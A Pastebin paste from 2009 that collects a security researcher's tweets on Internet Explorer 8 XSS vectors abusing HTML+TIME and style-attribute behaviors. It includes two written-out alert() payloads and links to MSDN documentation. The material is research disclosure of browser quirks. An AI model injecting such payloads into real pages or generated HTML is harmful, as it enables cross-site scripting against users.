SHARE
TWEET

mario

a guest Dec 30th, 2009 1,401 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 1. https://twitter.com/0x6D6172696F/status/7180793115:
  2. Ever heard about IE's HTML+TIME? http://is.gd/5G60U - enabling vectors like this: 1<x/style=`behavior:url(#default#time2)`onbegin=alert(2)>
  3.  
  4. 2. https://twitter.com/0x6D6172696F/status/7196312532:
  5. More HTML+TIME - changing link targets: http://pastebin.com/f521ea4e6
  6.  
  7. 3. https://twitter.com/0x6D6172696F/status/7196350903:
  8. XSS via style attribute - it's back :) <a style=behavior:url(#default#anchorclick) folder=javascript:alert(1) href=http://good.com>IE8</a>
  9.  
  10. 4. https://twitter.com/0x6D6172696F/status/7197250108:
  11. Just to have this little rascal persisted - self-executing XSS with ALL HTML elements on IE8 http://pastebin.com/f3712ff6a
  12.  
  13. More info on HTML+TIME:
  14.  * http://msdn.microsoft.com/de-de/library/ms533099%28en-us,VS.85%29.aspx
  15.  * http://msdn.microsoft.com/de-de/library/ms533102%28en-us,VS.85%29.aspx
  16.  * http://www.w3.org/TR/NOTE-HTMLplusTIME
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top